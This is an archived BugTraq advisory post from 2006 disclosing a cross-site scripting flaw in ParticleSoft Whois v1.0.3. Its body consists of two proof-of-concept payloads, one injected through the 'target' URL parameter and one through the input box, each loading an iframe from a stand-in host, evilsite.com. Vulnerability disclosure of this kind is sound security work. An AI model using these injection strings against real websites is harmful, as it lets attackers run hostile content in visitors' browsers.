BugTraq
ParticleSoft Whois v1.0.3 Jun 06 2006 12:12AM
luny youfucktard com
ParticleSoft Whois v1.0.3

Homepage:

http://www.particlesoft.net/particlewhois/

XSS Proof of concept viaurl injection:

http://whois.particlesoft.net/index.php?do=runcheck&target="><iframe src=http://evilsite.com/scriptlet.html <<"&ext=all

XSS Via input box:

"><iframe src=http://evilsite.com/scriptlet.html <<"

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus